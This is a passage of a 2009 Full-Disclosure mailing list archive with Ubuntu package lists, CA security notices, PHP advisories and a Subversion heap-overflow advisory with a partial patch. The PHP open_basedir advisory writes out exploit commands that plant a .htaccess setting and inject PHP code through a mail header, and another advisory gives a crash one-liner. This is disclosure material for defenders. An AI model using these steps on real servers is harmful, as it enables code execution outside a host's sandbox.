124706 88715c94e75a9208472f89315a43a191 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-7ubuntu0.3_lpia.deb Size/MD5: 75294 75ec0cb0a60394270ed01c624ab2ca45 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-7ubuntu0.3_powerpc.deb Size/MD5: 150370 b4ceaab7f90f66cfa7c1f49807392eb3 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-7ubuntu0.3_powerpc.deb Size/MD5: 136022 e387a546ebdac695e59c0a9c8e81c317 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-7ubuntu0.3_powerpc.deb Size/MD5: 84950 b686d8972716ba63a3d11d814839b9cf sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-7ubuntu0.3_sparc.deb Size/MD5: 135514 9827bf55329a04b17f6a7f84607cf2c2 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-7ubuntu0.3_sparc.deb Size/MD5: 128478 cb3c9c3ed8c65bb4150bb43695c7e100 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-7ubuntu0.3_sparc.deb Size/MD5: 75496 3ea0dff43bb0f651ae0148e448d13ad4 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg-8ubuntu0.3.diff.gz Size/MD5: 23312 6585617002ebb7d19e1bda7e099ae282 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg-8ubuntu0.3.dsc Size/MD5: 1630 f7de26eb17fec57fa163e3e4410206ba http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/apr-util_1.2.12+dfsg.orig.tar.gz Size/MD5: 658687 4ef3e41037fe0cdd3a0d107335a008eb amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8ubuntu0.3_amd64.deb Size/MD5: 147492 81a39d8f099e1df7ebe44fe183c4b862 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8ubuntu0.3_amd64.deb Size/MD5: 133158 b419556248ef642ba39d885977836d21 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-8ubuntu0.3_amd64.deb Size/MD5: 79108 ce8b662218c46553859aa56e62eb7478 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8ubuntu0.3_i386.deb Size/MD5: 140628 652b4cebfd41a022bce97331144cb781 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8ubuntu0.3_i386.deb Size/MD5: 121362 e7116f8304e07bfe3972909d5d3a2527 http://security.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-8ubuntu0.3_i386.deb Size/MD5: 72564 45123878c4a49deac7b9cd3d2ffc114b lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8ubuntu0.3_lpia.deb Size/MD5: 141900 5ebf828408751090b98f5bcc333091d1 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8ubuntu0.3_lpia.deb Size/MD5: 121152 7966b64663cdb9f2f356bab6bf5497a1 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-8ubuntu0.3_lpia.deb Size/MD5: 71974 fa4eecc0e9fbde67202a4d6cb23428a4 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8ubuntu0.3_powerpc.deb Size/MD5: 146736 c24f4e72d8d235ee281c73c0f28ed9d4 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8ubuntu0.3_powerpc.deb Size/MD5: 132578 08e7e684493b5be07caf87ee4a72b794 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-8ubuntu0.3_powerpc.deb Size/MD5: 81516 ddccbfd2f3c16afab66d3497e16b0a7b sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8ubuntu0.3_sparc.deb Size/MD5: 131528 05cf349f401cadcce9b4f05af60c5a7c http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8ubuntu0.3_sparc.deb Size/MD5: 124898 d558d40964826c4fd4653c31e1df8225 http://ports.ubuntu.com/pool/main/a/apr-util/libaprutil1_1.2.12+dfsg-8ubuntu0.3_sparc.deb Size/MD5: 71818 d0edb0876c741dfddbd063d9d84ea10f -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090808/7932bdbc/attachment.bin From Kevin.Kotas at ca.com Fri Aug 7 00:22:02 2009 From: Kevin.Kotas at ca.com (Kotas, Kevin J) Date: Thu, 6 Aug 2009 19:22:02 -0400 Subject: [Full-disclosure] CA20090806-01: Security Notice for Data Transport Services Message-ID: <1335FF3F144C424F839EFBA7AD8A56E00795657C@USILMS12.ca.com> -----BEGIN PGP SIGNED MESSAGE----- CA20090806-01: Security Notice for Data Transport Services Issued: August 6, 2009 CA's technical support is alerting customers to a security risk with Data Transport Services. A vulnerability exists that can allow a remote attacker to execute arbitrary code. CA has issued patches to address the issue. The vulnerability, CVE-2009-2026, is due to insufficient bounds checking in the dtscore library. An attacker can cause a buffer overflow which can result in the execution of arbitrary code with privileged access. Risk Rating High Platform Windows Affected Products CA Software Delivery r11.2 C1 CA Software Delivery r11.2 C2 CA Software Delivery r11.2 C3 CA Software Delivery r11.2 SP4 Unicenter Software Delivery 4.0 C3 CA Advantage Data Transport 3.0 C1 CA IT Client Manager r12 How to determine if the installation is affected For Windows: 1. Using Windows Explorer, locate the file indicated in the below table. By default, the file can be found in the following locations: Product File Directory Path CA Software Delivery r11.2 C1, C2, C3 dtscore11.dll C:\Program Files\CA\SC\DTS\bin CA Software Delivery r11.2 SP4 dtscore11.dll C:\Program Files\CA\SC\DTS\bin Unicenter Software Delivery 4.0 C3 dtscore.dll C:\Program Files\CA\SharedComponents\DTS\bin CA Advantage Data Transport 3.0 C1 dtscore.dll C:\Program Files\CA\SharedComponents\DTS\bin CA IT Client Manager r12 dtscore11.dll C:\Program Files\CA\SC\DTS\bin 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file date is earlier than indicated in the below table, the installation is vulnerable. Product File Name File Size (bytes) File Date CA Software Delivery r11.2 C1, C2, C3 dtscore11.dll 218376 THU APR 09 15:02:25 2009 CA Software Delivery r11.2 SP4 dtscore11.dll 218376 THU APR 09 15:19:47 2009 Unicenter Software Delivery 4.0 C3 dtscore.dll 167936 FRI FEB 20 08:22:46 2009 CA Advantage Data Transport 3.0 C1 dtscore.dll 167936 FRI FEB 20 08:22:46 2009 CA IT Client Manager r12 dtscore11.dll 18376 MON JUL 27 16:00:36 2009 Solution CA has issued the following patches to address the vulnerabilities. CA Software Delivery r11.2 C1, C2: Upgrade to r11.2 C3 and apply RO08984 or upgrade to r11.2 SP4 and apply RO08956. CA Software Delivery r11.2 C3: RO08984 CA Software Delivery r11.2 SP4: RO08956 Unicenter Software Delivery 4.0 C3, CA Advantage Data Transport 3.0 C1: RO08976 CA IT Client Manager r12: RO10086 References CVE-2009-2026 - dtscore.dll buffer overflow http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2026 CA20090806-01: Security Notice for Data Transport Services Acknowledgement CVE-2009-2026 - Orlando Padilla and Peter Silberman of Breakpoint Security working with ZDI/TippingPoint CA20090806-01: Security Notice for Data Transport Services (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21 4090 Change History Version 1.0: Initial Release If additional information is required, please contact CA Support at http://support.ca.com/ If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782 Kevin Kotas CA Product Vulnerability Response Team -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQEVAwUBSnti1JI1FvIeMomJAQFJCAgAkSSYbGTI7Q01XDvXA6vylRM/Vog3cEuG QWtbotLr7fBcDv24MeEhqCDAHN9EIyMfIey2DmM3hV1poUsGaogsXxxfANVBzKam 6fxQcizkov7p7Ux1wpR88N7hftZDdB12darUShQ2hE7//2HKFDiKJ3r6/JBE16xD ByhQSQcjvwWTWMJC5PfcTpy4wGu5NKLNXM7S4SbTYOt90Th0wdQiBnoyRE5HRkP2 IuRY3EL5wHhRpl1FoQQwAOpKyCniF32JILLKz4PZOKxQ3yuiUzEvzdr6VF2FrcFf EUoR8RanKq9u1lnRjG09LeQ943ncJGI4r7CcdMtvM8xPijJbYkJacw== =qtw7 -----END PGP SIGNATURE----- From Kevin.Kotas at ca.com Fri Aug 7 00:21:34 2009 From: Kevin.Kotas at ca.com (Kotas, Kevin J) Date: Thu, 6 Aug 2009 19:21:34 -0400 Subject: [Full-disclosure] CA20090806-02: Security Notice for Unicenter Asset Portfolio Management, Unicenter Desktop and Server Management, Unicenter Patch Management Message-ID: <1335FF3F144C424F839EFBA7AD8A56E00795657B@USILMS12.ca.com> -----BEGIN PGP SIGNED MESSAGE----- CA20090806-02: Security Notice for Unicenter Asset Portfolio Management, Unicenter Desktop and Server Management, Unicenter Patch Management Issued: August 6, 2009 CA's technical support is alerting customers to a security risk with Unicenter Asset Portfolio Management, Unicenter Desktop and Server Management, and Unicenter Patch Management. The release of Tomcat as included with the products is potentially susceptible to a cross-site scripting vulnerability. CA has issued a solution to address the issue. Risk Rating Medium Platform Windows Affected Products Unicenter Asset Portfolio Management 11.3 Unicenter Asset Portfolio Management 11.3.4 Unicenter Desktop and Server Management 11.2 Unicenter Patch Management 11.2 How to determine if the installation is affected Customers can use the following technical documents to determine if an installation is affected. Unicenter Asset Portfolio Management: TEC492816 Unicenter Desktop and Server Management: TEC491323 Unicenter Patch Management: TEC491323 Solution Unicenter Asset Portfolio Management: Follow the instructions in solution document RI09916. Unicenter Desktop and Server Management, Unicenter Patch Management: Follow the instructions in technical document TEC491323. References CVE-2008-1232 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232 CA20090806-02: Security Notice for Unicenter Asset Portfolio Management, Unicenter Desktop and Server Management, Unicenter Patch Management (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21 4095 Change History Version 1.0: Initial Release If additional information is required, please contact CA Support at http://support.ca.com/ If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. (line may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782 Kevin Kotas CA Product Vulnerability Response Team -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQEVAwUBSnti5pI1FvIeMomJAQFM0Qf/WnAvDpjlC+thQqPIJEaBUI5TBYoroLku dM/q10Xk54htqtNMEnbrNVZvIYStdcEpQe2SuW+0rSI3U1Pv5Bkn/ofrbv7muYGk hKQHfcliXLsjTuEq8aSSgmHVeMBwQ/Vwfnv5DClgrJ2LeW/J4uhG3g1NlB0gpTSw MkfOAc+4fyl0DHvHpDvUBNZCAATeTOijStW4orTJulcl+TyO6pkx1aDjfQb0sIL0 B3xlG7CjMJxisV63fJpgeUTV6pBRf0w9cqj5nAaIGsAKtZXjWzfwKWdLxU794JUa nDFDWBWgt1aDLH99PWH3lPjYgM8z/Bfe+FqBhHV/j0cqyosb7rYdag== =2uwe -----END PGP SIGNATURE----- From cxib at securityreason.com Fri Aug 7 14:26:50 2009 From: cxib at securityreason.com (Maksymilian Arciemowicz) Date: Fri, 07 Aug 2009 15:26:50 +0200 Subject: [Full-disclosure] PHP 5.3.0 (main.c) open_basedir bypass Message-ID: <4A7C2B9A.1070807@securityreason.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [ PHP 5.3.0 (main.c) open_basedir bypass ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - - Dis.: 26.05.2009 - - - Pub.: 06.08.2009 Risk: Medium Affected Software: PHP 5.3.0 Original URL: http://securityreason.com/achievement_securityalert/64 - - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/mail.configuration.php mail.log NULL PHP_INI_SYSTEM|PHP_INI_PERDIR Available since PHP 5.3.0. - - --- 1. PHP 5.3.0 (main.c) open_basedir bypass --- The first issue exists in main/main.c - - --- STD_PHP_INI_ENTRY("mail.log", NULL, PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateString, mail_log, php_core_globals, core_globals) - - --- Access PHP_INI_PERDIR is accepted by .htaccess (Apache) or .user.ini (CGI). Function OnUpdateString dosen't check open_basedir. To reason, we need create new function OpUpdateMailLog, where open_basedir will be checked. Exploit: 127# cat /www/home/cx/show.php 127# curl http://localhost/home/cx/show.php /www/home/cx 127# cat /www/home/cx/set.php 127# curl http://localhost/home/cx/set.php Warning: ini_set(): open_basedir restriction in effect. File(/www/home/gpkc/tmp/) is not within the allowed path(s): (/www/home/cx) in /www/home/cx/set.php on line 2 We need create .htaccess or .user.ini for Apache SAPI: 127# echo 'php_value mail.log /www/home/gkpc/tmp/exploit.php' > ./.htaccess for CGI: 127# echo 'mail.log = /www/home/gkpc/tmp/exploit.php' > ./.user.ini and some file with mail() function inside. In header X-Mailer, we can put some php code to execute in other open_basedir range, like: 127# cat /www/home/cx/runmail.php /' . phpversion(); mail($to, $subject, $message, $headers); ?> 127# curl http://localhost/home/cx/runmail.php 127# ls -la /www/home/gkpc/tmp/exploit.php - - -rw-r--r-- 1 www www 173 Jun 30 05:20 /www/home/gkpc/tmp/exploit.php Finish! Now we can exec evil script exploit.php via httpd. 127# curl http://localhost/home/gkpc/tmp/exploit.php mail() on [/www/home/cx/runmail.php:9]: To: stop at spam.c0m -- Headers: From: stop at spam.c0m Reply-To: stop at spam.c0m X-Mailer: PHP/www/home/gkpc/5.3.0 exploit.php is now in open_basedir=/www/home/gkpc/ range. - - --- 2. Fix --- http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c - - --- 3. Greets --- sp3x Infospec Chujwamwdupe p_e_a pi3 - - --- 4. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib {a.t] securityreason [d00t>com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl - -----BEGIN PGP SIGNATURE----- iEYEARECAAYFAkp7FY4ACgkQpiCeOKaYa9YP7ACeKLHh47A/PJo7oPducKF/Iu0N SZMAn0dMdoqrEnwYZeB2KuzlCK7wc/rB =jSMc - -----END PGP SIGNATURE----- -----BEGIN PGP SIGNATURE----- iEYEARECAAYFAkp8K5kACgkQpiCeOKaYa9Yv0wCgulgKdIlAx8fErD+/f7Do/hbs qpQAn3VloWZCINo3wmqt4+uIo/m3fO7c =0K2+ -----END PGP SIGNATURE----- From cxib at securityreason.com Fri Aug 7 14:28:02 2009 From: cxib at securityreason.com (Maksymilian Arciemowicz) Date: Fri, 07 Aug 2009 15:28:02 +0200 Subject: [Full-disclosure] SECURITYREASON: PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure Message-ID: <4A7C2BE2.1050209@securityreason.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - - Dis.: 10.07.2009 - - - Pub.: 06.08.2009 Risk: High Affected Software: - - - PHP 5.3.0 - - - PHP 5.2.10 Original URL: http://securityreason.com/achievement_securityalert/65 - - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/function.ini-restore.php ini_restore ? Restores the value of a configuration option ini_restore ( string $varname ) - - --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure --- The main problem exist in restoring php config environments. To demonstrate the problem, we need to declare variables via ini_set() function. When we try use ini_restore(), variables in class PG() will indicate any part of memory. - - ---zend_ini.c--- static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage TSRMLS_DC) /* {{{ */ { if (ini_entry->modified) { if (ini_entry->on_modify) { zend_try { /* even if on_modify bails out, we have to continue on with restoring, since there can be allocated variables that would be freed on MM shutdown and would lead to memory corruption later ini entry is modified again */ ini_entry->on_modify(ini_entry, ini_entry->orig_value, ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2, ini_entry->mh_arg3, stage TSRMLS_CC); } zend_end_try(); } if (ini_entry->value != ini_entry->orig_value) { efree(ini_entry->value); } ini_entry->value = ini_entry->orig_value; ini_entry->value_length = ini_entry->orig_value_length; ini_entry->modified = 0; ini_entry->orig_value = NULL; ini_entry->orig_value_length = 0; if (ini_entry->modifiable >= (1 << 3)) { ini_entry->modifiable >>= 3; } } return 0; } - - ---zend_ini.c--- Flag modified will be reset, and we can not considered modified variable. We don't check value of ini_entry->on_modify() and PG() will be now out of memory range. To demonstrate this issue - - ---example0 (5.2.10/5.3.0)--- 127# uname -a && php -v OpenBSD 127.cxib 4.6 GENERIC#0 i386 PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH 127# cat /var/www/www/sess.php 127# php /var/www/www/sess.php AAA PHP Warning: session_start(): open($?|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No such file or directory (2) in /var/www/www/sess.php on line 5 PHP Warning: Unknown: open($?|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No such file or directory (2) in Unknown on line 0 PHP Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct ($?|ma: no-cache) in Unknown on line 0 127# php /var/www/www/sess.php PHP Warning: session_start(): open(?^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No such file or directory (2) in /var/www/www/sess.php on line 5 PHP Warning: Unknown: open(?^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No such file or directory (2) in Unknown on line 0 PHP Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (?^j|ma: no-cache) in Unknown on line 0 - - ---example0 (5.2.10/5.3.0)--- The main problem is started in ini_restore("session.save_path"). To show this issue, we need use some function with PG() inside (like: session_start()). - - ---example1 (5.3.0)--- 127# uname -mrs && php -v NetBSD 5.0 i386 PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyrght (c) 1998-2009 Zend Technologies 127# cat /www/file.php 127# php /www/file.php PHP Warning: include(): open_basedir restriction in effect. File(B) is not within the allowed path(s): (4?e?X?p?) in /www/file.php on line 7 Warning: include(): open_basedir restriction in effect. File(B) is not within the allowed path(s): (4?e?X?p?) in /www/file.php on line 7 PHP Warning: include(B): failed to open stream: Operation not permitted in /www/file.php on line 7 Warning: include(B): failed to open stream: Operation not permitted in /www/file.php on line 7 PHP Warning: include(): Failed opening 'B' for inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7 Warning: include(): Failed opening 'B' for inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7 127# curl http://localhost/file.php
Warning: include() [function.include]: open_basedir restriction in effect. File(B) is not within the allowed path(s): (??e?Hup?) in /www/file.php on line 7

Warning: include(B) [function.include]: failed to open stream: Operation not permitted in /www/file.php on line 7

Warning: include() [function.include]: Failed opening 'B' for inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7
- - ---example1 (5.3.0)--- Variable PG(open_basedir) is now out of range. So any function (like: include()) with php_error_docref(NULL TSRMLS_CC, E_WARNING, "open_basedir restriction in effect. File(%s) is not within the allowed path(s): (%s)", path, PG(open_basedir)); will print memory examples: - - --- Warning: ini_restore() [function.ini-restore]: open_basedir restriction in effect. File() is not within the allowed path(s): (??f?ESSID) in /www/ssij.php on line 8 Warning: ini_restore() [function.ini-restore]: open_basedir restriction in effect. File() is not within the allowed path(s): (,?f?aaaaaa) in /www/ssij.php on line 8 Warning: ini_restore() [function.ini-restore]: open_basedir restriction in effect. File() is not within the allowed path(s): (??f?ESSID) in /www/ssij.php on line 8 Warning: ini_restore() [function.ini-restore]: open_basedir restriction in effect. File() is not within the allowed path(s): (??e?ef_root) in /www/ssij.php on line 8 Warning: ini_restore() [function.ini-restore]: open_basedir restriction in effect. File() is not within the allowed path(s): (4?e?r.ini) in /www/ssij.php on line 8 - - --- Variables in class PG, may take any value. So code such as if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC)) can be manipulated. But not only zend_ini.c have issue. When we try use ini_set() and ini_restore() for error_log, php will crash. Function OnUpdateErrorLog, dosen't check that new_value is empty (null point). It should provide to crash. - - ---main.c--- static PHP_INI_MH(OnUpdateErrorLog) { ... /* Only do the safemode/open_basedir check at runtime */ if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS) && strcmp(new_value, "syslog")) { ... - - ---main.c--- strcmp(3) will check new_value. So new_value can not be NULL. here: STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog, error_log, php_core_globals, core_globals) default error_log is NULL ...("error_log", NULL,... so if we put some string, and remove it, php should crash 127# php -r 'ini_set("error_log","A");ini_restore("error_log");' Segmentation fault (core dumped) 127# gdb -q php (gdb) r -r 'ini_set("error_log","A");ini_restore("error_log");' Starting program: /usr/local/bin/php -r 'ini_set("error_log","A");ini_restore("error_log");' Program received signal SIGSEGV, Segmentation fault. 0x288ee410 in strcmp () from /lib/libc.so.7 bt: #0 0x288ee410 in strcmp () from /lib/libc.so.7 #1 0x081c7b85 in OnUpdateErrorLog (entry=0x28a65a80, new_value=0x0, new_value_length=3, mh_arg1=0x38, mh_arg2=0x83d5420, mh_arg3=0x0, stage=16) at /usr/ports/lang/php5/work/php-5.3.0/main/main.c:354 #2 0x0824cb85 in zend_restore_ini_entry_cb (ini_entry=0x28a65a80, stage=16) at /usr/ports/lang/php5/work/php-5.3.0/Zend/zend_ini.c:55 #3 0x0824d3f5 in zend_restore_ini_entry (name=0x28a1e36c "error_log", name_length=10, stage=16) ... Functions like OnUpdateErrorLog, should check, that new_value is not a NULL pointer. - - --- 2. Fix --- (5.3.0): http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/Zend/zend_ini.c http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c (5.2.10): http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/Zend/zend_ini.c http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c - - --- 3. Greets --- stas sp3x Infospec Chujwamwdupe p_e_a pi3 - - --- 4. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib {a.t] securityreason [d00t} com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl - -----BEGIN PGP SIGNATURE----- iEYEARECAAYFAkp7FoMACgkQpiCeOKaYa9YWFwCbBhEvA69nQDgwXyuDdU8wbjmu ZIEAniHiQ3puTKqEtw9u8g6/T/806j7A =DvtO - -----END PGP SIGNATURE----- -----BEGIN PGP SIGNATURE----- iEYEARECAAYFAkp8K+IACgkQpiCeOKaYa9YUewCfWuE0ehBHN9yKqTMSbjqyKFha HxkAoKCMZuWZIUWUn/4TZI6b+fDk5aiH =khdY -----END PGP SIGNATURE----- From mattlewis at google.com Fri Aug 7 15:47:24 2009 From: mattlewis at google.com (Matt Lewis) Date: Fri, 7 Aug 2009 15:47:24 +0100 Subject: [Full-disclosure] Subversion heap overflow Message-ID: Subversion clients and servers, versions 1.6.0 - 1.6.3 and all versions < 1.5.7, are vulnerable to several heap overflow problems which may lead to remote code execution. The official advisory (mirrored at http://subversion.tigris.org/security/CVE-2009-2411-advisory.txt) follows: Subversion clients and servers up to 1.6.3 (inclusive) have heap overflow issues in the parsing of binary deltas. Summary: ======== Subversion clients and servers have multiple heap overflow issues in the parsing of binary deltas. This is related to an allocation vulnerability in the APR library used by Subversion. Clients with commit access to a vulnerable server can cause a remote heap overflow; servers can cause a heap overflow on vulnerable clients that try to do a checkout or update. This can lead to a DoS (an exploit has been tested) and to arbitrary code execution (no exploit tested, but the possibility is clear). Known vulnerable: ================= Subversion clients and servers <= 1.5.6. Subversion clients and servers 1.6.0 through 1.6.3 (inclusive). Known fixed: ============ Subversion 1.6.4 Subversion 1.5.7 (Search for "Patch" below to see the patches from 1.6.3 -> 1.6.4 and 1.5.6 -> 1.5.7. Search for "Recommendations" to get URLs for the 1.6.4 release and associated APR library patch.) Details: ======== The libsvn_delta library does not contain sufficient input validation of svndiff streams. If a stream with large windows is processed, one of several integer overflows may lead to some boundary checks incorrectly passing, which in turn can lead to a heap overflow. Severity: ========= A remote attacker with commit access to repository may be able to execute code on a Subversion server. A malicious server may be able to execute code on a Subversion client. Recommendations: ================ We recommend all users to upgrade to Subversion 1.6.4. We recommend all users to upgrade to the latest versions of APR and APR-UTIL, or apply the CVE-2009-2412 patch appropriate to their APR installation from . New Subversion packages can be found at: http://subversion.tigris.org/project_packages.html References: =========== CVE-2009-2411 (Subversion) CVE-2009-2412 (APR) Reported by: ============ Matt Lewis, Google. Patches: ======== This patch applies to Subversion 1.6.x (apply with patch -p0 < patchfile): [[[ Index: subversion/libsvn_delta/svndiff.c =================================================================== --- subversion/libsvn_delta/svndiff.c (revision 38519) +++ subversion/libsvn_delta/svndiff.c (working copy) @@ -60,10 +60,23 @@ struct encoder_baton { apr_pool_t *pool; }; +/* This is at least as big as the largest size of an integer that + encode_int can generate; it is sufficient for creating buffers for + it to write into. This assumes that integers are at most 64 bits, + and so 10 bytes (with 7 bits of information each) are sufficient to + represent them. */ +#define MAX_ENCODED_INT_LEN 10 +/* This is at least as big as the largest size for a single instruction. */ +#define MAX_INSTRUCTION_LEN (2*MAX_ENCODED_INT_LEN+1) +/* This is at least as big as the largest possible instructions + section: in theory, the instructions could be SVN_DELTA_WINDOW_SIZE + 1-byte copy-from-source instructions (though this is very unlikely). */ +#define MAX_INSTRUCTION_SECTION_LEN (SVN_DELTA_WINDOW_SIZE*MAX_INSTRUCTION_LEN) /* Encode VAL into the buffer P using the variable-length svndiff integer format. Return the incremented value of P after the - encoded bytes have been written. + encoded bytes have been written. P must point to a buffer of size + at least MAX_ENCODED_INT_LEN. This encoding uses the high bit of each byte as a continuation bit and the other seven bits as data bits. High-order data bits are @@ -85,7 +98,7 @@ encode_int(char *p, svn_filesize_t val) svn_filesize_t v; unsigned char cont; - assert(val >= 0); + SVN_ERR_ASSERT_NO_RETURN(val >= 0); /* Figure out how many bytes we'll need. */ v = val >> 7; @@ -96,6 +109,8 @@ encode_int(char *p, svn_filesize_t val) n++; } + SVN_ERR_ASSERT_NO_RETURN(n <= MAX_ENCODED_INT_LEN); + /* Encode the remaining bytes; n is always the number of bytes coming after the one we're encoding. */ while (--n >= 0) @@ -112,7 +127,7 @@ encode_int(char *p, svn_filesize_t val) static void append_encoded_int(svn_stringbuf_t *header, svn_filesize_t val) { - char buf[128], *p; + char buf[MAX_ENCODED_INT_LEN], *p; p = encode_int(buf, val); svn_stringbuf_appendbytes(header, buf, p - buf); @@ -168,7 +183,7 @@ window_handler(svn_txdelta_window_t *window, void svn_stringbuf_t *i1 = svn_stringbuf_create("", pool); svn_stringbuf_t *header = svn_stringbuf_create("", pool); const svn_string_t *newdata; - char ibuf[128], *ip; + char ibuf[MAX_INSTRUCTION_LEN], *ip; const svn_txdelta_op_t *op; apr_size_t len; @@ -346,6 +361,8 @@ decode_file_offset(svn_filesize_t *val, const unsigned char *p, const unsigned char *end) { + if (p + MAX_ENCODED_INT_LEN < end) + end = p + MAX_ENCODED_INT_LEN; /* Decode bytes until we're done. */ *val = 0; while (p < end) @@ -365,6 +382,8 @@ decode_size(apr_size_t *val, const unsigned char *p, const unsigned char *end) { + if (p + MAX_ENCODED_INT_LEN < end) + end = p + MAX_ENCODED_INT_LEN; /* Decode bytes until we're done. */ *val = 0; while (p < end) @@ -382,7 +401,7 @@ decode_size(apr_size_t *val, data is not compressed. */ static svn_error_t * -zlib_decode(svn_stringbuf_t *in, svn_stringbuf_t *out) +zlib_decode(svn_stringbuf_t *in, svn_stringbuf_t *out, apr_size_t limit) { apr_size_t len; char *oldplace = in->data; @@ -390,6 +409,13 @@ static svn_error_t * /* First thing in the string is the original length. */ in->data = (char *)decode_size(&len, (unsigned char *)in->data, (unsigned char *)in->data+in->len); + if (in->data == NULL) + return 